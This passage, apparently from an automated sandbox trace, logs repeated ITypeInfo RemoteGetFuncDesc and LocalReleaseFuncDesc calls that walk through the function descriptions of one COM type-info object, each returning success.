ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5e, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5f, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x60, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x61, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x62, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x63, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x64, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x65, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x66, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x67, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x68, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x69, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6a, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6b, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6c, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6d, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6e, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6f, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x70, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x71, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.298] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x72, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x73, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x74, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x75, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x76, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x77, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x78, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x79, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7a, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7b, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7c, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7d, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7e, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7f, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x80, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x81, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x82, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x83, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x84, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x85, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.299] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x86, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x87, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x88, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x89, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8a, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8b, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8c, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8d, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8e, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8f, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x90, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x91, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x92, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x93, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x94, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x95, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x96, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x97, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x98, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x99, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9a, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.300] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9b, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9c, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9d, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9e, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9f, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa0, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa1, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa2, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa3, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa4, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa5, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa6, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa7, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa8, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa9, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xaa, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xab, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xac, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xad, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xae, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xaf, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.301] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb0, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb1, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb2, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb3, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb4, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb5, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb6, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb7, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb8, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb9, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xba, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbb, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbc, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbd, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbe, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbf, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc0, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc1, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc2, ppFuncDesc=0x186688, pDummy=0x140 | out: ppFuncDesc=0x186688, pDummy=0x140) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc3, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc4, ppFuncDesc=0x186688, pDummy=0x100 | out: ppFuncDesc=0x186688, pDummy=0x100) returned 0x0 [0041.302] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc5, ppFuncDesc=0x186688, pDummy=0x100 | out: 